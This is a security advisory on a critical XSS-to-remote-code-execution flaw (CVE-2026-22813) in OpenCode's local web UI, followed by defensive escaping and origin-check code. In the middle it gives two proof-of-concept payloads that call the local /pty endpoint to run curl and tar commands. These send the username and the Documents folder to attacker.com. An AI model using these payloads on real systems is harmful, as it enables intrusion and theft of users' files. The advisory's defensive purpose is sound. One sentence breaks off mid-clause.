OpenCode patches critical RCE flaw in Web UI
Take action: If you are using OpenCode, update to version 1.1.10 as soon as possible; it disables the vulnerable web UI and API. Avoid clicking untrusted links, check the underlying URL before following a link, and do not open any link you did not craft yourself that points at a port on your local machine.
Learn More
OpenCode developers fixed a critical security flaw that let malicious websites run commands on a user's local computer.
The vulnerability is tracked as CVE-2026-22813 (CVSS score 10.0): a lack of sanitization in the markdown renderer allows XSS, which leads to remote code execution via the local API endpoints.
The flaw combines multiple weaknesses: OpenCode runs a local HTTP server on localhost:4096 with /pty/ endpoints that can spawn arbitrary processes, the web UI fails to sanitize HTML in markdown responses allowing cross-site scripting (XSS), and a ?url= parameter permits loading chat sessions from remote servers. An attacker can host a malicious chat session on their server containing XSS payloads, then trick users into clicking a link that loads this session into their local OpenCode instance. Once the JavaScript executes on the localhost:4096 origin, it can make API calls to the /pty/ endpoints to run any command on the victim's machine. The vulnerability affects all versions before 1.1.10, and while the OpenCode team implemented a server-side fix to block the ?url= parameter,
Exploit 1: Basic Command Execution
Attacker creates malicious chat message:
```html
Hello! <img src="/favicon.png" onerror="
fetch('/pty', {
  method: 'POST',
  body: JSON.stringify({
    command: '/bin/sh',
    args: ['-c', 'curl https://attacker.com/steal?data=$(whoami)']
  })
})
" style="display:none">
```
**Victim clicks link:**
```
http://localhost:4096/session/malicious?url=https://attacker.com
```
Result: Command executes on victim's machine, stealing username.
Exploit 2: Ransomware/Data Theft
Malicious payload in chat session:
```html
<script>
fetch('/pty', {
  method: 'POST',
  body: JSON.stringify({
    command: '/bin/sh',
    args: ['-c', 'tar -czf /tmp/docs.tar.gz ~/Documents && curl -F file=@/tmp/docs.tar.gz https://attacker.com/upload']
  })
})
</script>
```
Result: Victim's Documents folder is compressed and exfiltrated to attacker's server.
The OpenCode team released version 1.1.10, which disables the web UI and API entirely to stop future attacks. Users should update to the latest version to protect their systems.
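As an added, defensive illustration (not code from the OpenCode project), the JavaScript below shows the two checks that break the chain described above: escaping chat markdown before it reaches the DOM, so raw HTML such as an `<img onerror>` or `<script>` is displayed rather than executed, and a session-source check that accepts only the local UI's own origin, in the spirit of the `?url=` fix the advisory mentions. The function names, the sample message and the `http://localhost:4096` default are assumptions made for this example.

```javascript
// Added example, not OpenCode's code. Function names, the sample message and
// the local origin are hypothetical; they model the two weaknesses described
// in the advisory: raw HTML in chat markdown reaching the DOM, and a ?url=
// parameter that loads a session from a remote server.

// Escape the characters that turn text into markup. Once escaped, an
// <img onerror=...> or <script> inside a chat message is shown, not run.
function escapeHtml(text) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return text.replace(/[&<>"']/g, (c) => map[c]);
}

// Minimal markdown-to-HTML renderer: escape everything first, then re-add a
// small allowlist of inline markup (**bold**, `code`, http(s) links only).
// Because the link rule requires an http(s) scheme, javascript: URLs never
// become anchors; the anchor also carries rel="noopener noreferrer".
function renderMarkdownSafely(markdown) {
  let html = escapeHtml(markdown);
  html = html.replace(/`([^`\n]+)`/g, '<code>$1</code>');
  html = html.replace(/\*\*([^*\n]+)\*\*/g, '<strong>$1</strong>');
  html = html.replace(
    /\[([^\]\n]+)\]\((https?:\/\/[^)\s]+)\)/g,
    '<a href="$2" rel="noopener noreferrer">$1</a>',
  );
  return html;
}

// Session-source check in the spirit of the ?url= fix: accept only sources on
// the local UI's own origin. Remote hosts (including look-alike hostnames such
// as localhost:4096.example), protocol-relative URLs, non-http schemes and
// malformed or non-string values are rejected; a relative path resolves
// against the local origin and is accepted.
function isAllowedSessionSource(candidate, localOrigin = 'http://localhost:4096') {
  if (typeof candidate !== 'string') return false;
  let parsed;
  try {
    parsed = new URL(candidate, localOrigin);
  } catch {
    return false;
  }
  return parsed.origin === localOrigin;
}

// Constructed sample chat message containing a benign XSS canary.
const SAMPLE_MESSAGE =
  'Hello! <img src="x" onerror="alert(1)"> see **docs** at [site](https://example.com/a?b=1&c=2)';

console.log(renderMarkdownSafely(SAMPLE_MESSAGE));
console.log(isAllowedSessionSource('https://attacker.example/session.json'));
```

A production UI would normally hand the rendered HTML to a maintained sanitizer such as DOMPurify rather than rely on a hand-written renderer; the point of this example is the ordering (escape first, then add only known-safe constructs) and the origin comparison on the session source, which together remove both the script-execution step and the remote-loading step.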